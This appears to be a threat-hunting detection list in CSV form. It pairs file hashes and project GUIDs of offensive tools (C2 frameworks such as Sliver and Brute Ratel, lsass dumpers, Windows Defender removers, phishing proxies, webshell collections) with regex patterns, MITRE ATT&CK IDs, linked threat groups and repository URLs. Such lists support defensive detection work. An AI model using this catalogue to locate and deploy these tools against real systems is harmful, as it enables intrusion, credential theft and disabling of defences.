"*b87c2a25945a735f4550eba7155c5e363e0406b7930b7205c762540ac672a097*",".{0,1000}b87c2a25945a735f4550eba7155c5e363e0406b7930b7205c762540ac672a097.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35010"
"*b88377088eef28045877c620f1a713356ce155885a61b073d3f4569675bda0e7*",".{0,1000}b88377088eef28045877c620f1a713356ce155885a61b073d3f4569675bda0e7.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","35011"
"*b8860da17ef3184d74987dd804109669ab503b2faa70438b8072f27b24f6c00a*",".{0,1000}b8860da17ef3184d74987dd804109669ab503b2faa70438b8072f27b24f6c00a.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","35013"
"*b887e2c6fbc2358ddae1a0b5335292faabaf628941a19b018230c0a5195201a0*",".{0,1000}b887e2c6fbc2358ddae1a0b5335292faabaf628941a19b018230c0a5195201a0.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","35015"
"*B88B65D3-2689-4E39-892C-7532087174CB*",".{0,1000}B88B65D3\-2689\-4E39\-892C\-7532087174CB.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#GUIDproject","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","35016"
"*b88da2e2ea72952817c28091798efa4c08bed068b6c399799627d89a74968e81*",".{0,1000}b88da2e2ea72952817c28091798efa4c08bed068b6c399799627d89a74968e81.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","35017"
"*b88e406cbf20a830e357e89a3e3aa4210829777d43a5fb11d46e38a4220f4d9a*",".{0,1000}b88e406cbf20a830e357e89a3e3aa4210829777d43a5fb11d46e38a4220f4d9a.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","35018"
"*b8939f328f43eafc2faa8ba8532a756eb9db47e00e947ad8543484b4b0958bb8*",".{0,1000}b8939f328f43eafc2faa8ba8532a756eb9db47e00e947ad8543484b4b0958bb8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35019"
"*b89570294bb08b6ac4245fe0db6e35c1b23fa01ad3a9ac0bfe07043c7af3350c*",".{0,1000}b89570294bb08b6ac4245fe0db6e35c1b23fa01ad3a9ac0bfe07043c7af3350c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35020"
"*b898e52e3799d4c3c4fa328c400ba620c814c11ca23d0b7ec2f3fd7917a7e8a1*",".{0,1000}b898e52e3799d4c3c4fa328c400ba620c814c11ca23d0b7ec2f3fd7917a7e8a1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35021"
"*b89f0a3b10b8b73f873fec267286a6c006220ea2a7163052b25cb130cf38086d*",".{0,1000}b89f0a3b10b8b73f873fec267286a6c006220ea2a7163052b25cb130cf38086d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35022"
"*b8a1f340423a7c8c32c364c61208b094fbd4ba05aee0dacb8d9d04584334dfc7*",".{0,1000}b8a1f340423a7c8c32c364c61208b094fbd4ba05aee0dacb8d9d04584334dfc7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35024"
"*b8a902ac3876c007c2e9ccef7a508430b5a8cc6dbcbf9794861bb8f62c82f064*",".{0,1000}b8a902ac3876c007c2e9ccef7a508430b5a8cc6dbcbf9794861bb8f62c82f064.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35026"
"*b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235*","b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","35027"
"*b8ae91971edca5937251c1f9a09ca5eb2c48a98ef4a80187394f2c037bbefb46*",".{0,1000}b8ae91971edca5937251c1f9a09ca5eb2c48a98ef4a80187394f2c037bbefb46.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35028"
"*B8AEE3F1-0642-443C-B42C-33BADCD42365*",".{0,1000}B8AEE3F1\-0642\-443C\-B42C\-33BADCD42365.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","#GUIDproject","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","35029"
"*b8b0e6a5452420520359221d8f527a35ec6b4da45f55179a1ffd5b820d1c35dc*",".{0,1000}b8b0e6a5452420520359221d8f527a35ec6b4da45f55179a1ffd5b820d1c35dc.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","35030"
"*b8c9caeda6743d224835019b8bdc0105ad54f9a804a33e7e51acb605a8e8bc25*",".{0,1000}b8c9caeda6743d224835019b8bdc0105ad54f9a804a33e7e51acb605a8e8bc25.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","#filehash","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","35033"
"*b8ca777d50193a7734680db80690c6106076a9b5b279300a6a52bae8564dad2f*",".{0,1000}b8ca777d50193a7734680db80690c6106076a9b5b279300a6a52bae8564dad2f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","35034"
"*b8d9531ece7787f90d6b6bd5bf28e910d28bf3a5d6bb3deb0d0719cc01d2754b*",".{0,1000}b8d9531ece7787f90d6b6bd5bf28e910d28bf3a5d6bb3deb0d0719cc01d2754b.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","35035"
"*b8e498773afbb4d216be790053b45824bb4c884cb96fbe486209418251d9f737*",".{0,1000}b8e498773afbb4d216be790053b45824bb4c884cb96fbe486209418251d9f737.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35038"
"*b8eb020a2cbb47146669cfe31c64bb2e7d6499d049c493d6418b9716f5c74583*",".{0,1000}b8eb020a2cbb47146669cfe31c64bb2e7d6499d049c493d6418b9716f5c74583.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","35040"
"*b8f44b3631dcc6e055b710d873486f3b3385ea06f38d160a7f6da2d7e6c809c3*",".{0,1000}b8f44b3631dcc6e055b710d873486f3b3385ea06f38d160a7f6da2d7e6c809c3.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","35041"
"*b8f5ed1345cb6970bd21babe5a58d45e035a9ecd04b961b995b2a03023beea87*",".{0,1000}b8f5ed1345cb6970bd21babe5a58d45e035a9ecd04b961b995b2a03023beea87.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","#filehash","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","35042"
"*b8f82558b584911473782894f452d3807367b378e8fd1e5be7956e53c4baf1dc*",".{0,1000}b8f82558b584911473782894f452d3807367b378e8fd1e5be7956e53c4baf1dc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35043"
"*b8fd450e16610f3cc307e7b1b3309ad4e79456860ec16dec1006250b8afe49b2*",".{0,1000}b8fd450e16610f3cc307e7b1b3309ad4e79456860ec16dec1006250b8afe49b2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35044"
"*B8FF9629-B4CE-4871-A2CD-8E6D73F6DF9E*",".{0,1000}B8FF9629\-B4CE\-4871\-A2CD\-8E6D73F6DF9E.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","35045"
"*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","35046"
"*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","35047"
"*b91166d5623d4077003ae8527e9169092994f5c189c8a3820b32e204b4230578*",".{0,1000}b91166d5623d4077003ae8527e9169092994f5c189c8a3820b32e204b4230578.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","35048"
"*b91e1b481db19677207c0175a5296fbd769bf9f18bd24837f04d48e417c5e8a4*",".{0,1000}b91e1b481db19677207c0175a5296fbd769bf9f18bd24837f04d48e417c5e8a4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35049"
"*b92299d248537a4d1adaaf7bccfed772d2d5a0966a886ff66718280f9abba372*",".{0,1000}b92299d248537a4d1adaaf7bccfed772d2d5a0966a886ff66718280f9abba372.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35051"
"*b923736184bba7b4588e1d53759912b2c89293387a1d9df7938626d475fb9c6b*",".{0,1000}b923736184bba7b4588e1d53759912b2c89293387a1d9df7938626d475fb9c6b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35052"
"*b92a34dfe966a9540d853cb5762574e659a33f965b532e453f5f0a2619505096*",".{0,1000}b92a34dfe966a9540d853cb5762574e659a33f965b532e453f5f0a2619505096.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35053"
"*b92a810f34ccdcaf783067a0534be97ee2f51561ce8a07a948c887edb234dda4*",".{0,1000}b92a810f34ccdcaf783067a0534be97ee2f51561ce8a07a948c887edb234dda4.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","35054"
"*B92B6B67-C7C8-4548-85EE-A215D74C000D*",".{0,1000}B92B6B67\-C7C8\-4548\-85EE\-A215D74C000D.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#GUIDproject","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","35055"
"*b936913f0aef2efd1184619af801739258328dd3118d8693dd02811aa6ac16cb*",".{0,1000}b936913f0aef2efd1184619af801739258328dd3118d8693dd02811aa6ac16cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35057"
"*b938ac4eb603113d3617ddcfeb8fbb32a6bbe54b1419482966b41ee8b1dc05b9*",".{0,1000}b938ac4eb603113d3617ddcfeb8fbb32a6bbe54b1419482966b41ee8b1dc05b9.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","35058"
"*b93d9656d13b3867ba6e27f6bf529d394558e9b555d7564664d50f63cc361864*",".{0,1000}b93d9656d13b3867ba6e27f6bf529d394558e9b555d7564664d50f63cc361864.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35059"
"*b94466ebb0aa74a4b4b35da803416e130db2826ee1d0b4191f88c8d602cf4443*",".{0,1000}b94466ebb0aa74a4b4b35da803416e130db2826ee1d0b4191f88c8d602cf4443.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35061"
"*B948E25D061039D64115CFDE74D2FF4372E83765*",".{0,1000}B948E25D061039D64115CFDE74D2FF4372E83765.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","35063"
"*b949f1eeba7260b233e58123507605328133428e37bbccb6aa2dd9ba68cf18b5*",".{0,1000}b949f1eeba7260b233e58123507605328133428e37bbccb6aa2dd9ba68cf18b5.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","35064"
"*b94ad2d15b45c6a236d1414f787f59fe0a9d3538c0591c6764e67a77b4869948*",".{0,1000}b94ad2d15b45c6a236d1414f787f59fe0a9d3538c0591c6764e67a77b4869948.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35065"
"*b94e6e9fe00aa1789f2b29bada37cd9fbf2dffe29cab668b1500621830dd1040*",".{0,1000}b94e6e9fe00aa1789f2b29bada37cd9fbf2dffe29cab668b1500621830dd1040.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35066"
"*b950b16b3e207f829f926b62cd1e75e774d57f9e676dcf01191d054fac7dd2f5*",".{0,1000}b950b16b3e207f829f926b62cd1e75e774d57f9e676dcf01191d054fac7dd2f5.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","35067"
"*b9554f35c8c8dc4a5b428322fea2fa3a00cec87a17c5ed276a6dfe804f3828ed*",".{0,1000}b9554f35c8c8dc4a5b428322fea2fa3a00cec87a17c5ed276a6dfe804f3828ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35068"
"*b95885582cc9fc5ac5491deeb5469e36b5eacafd2699579c3a8eeb6ce1a9e0dd*",".{0,1000}b95885582cc9fc5ac5491deeb5469e36b5eacafd2699579c3a8eeb6ce1a9e0dd.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","35070"
"*B9635D08-2BB2-404B-92B7-6A4981CB34F3*",".{0,1000}B9635D08\-2BB2\-404B\-92B7\-6A4981CB34F3.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","35073"
"*b9709f5925db2c34124f1f590251a4b059e594d480223b2aaaaf1e9085f5eace*",".{0,1000}b9709f5925db2c34124f1f590251a4b059e594d480223b2aaaaf1e9085f5eace.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","35075"
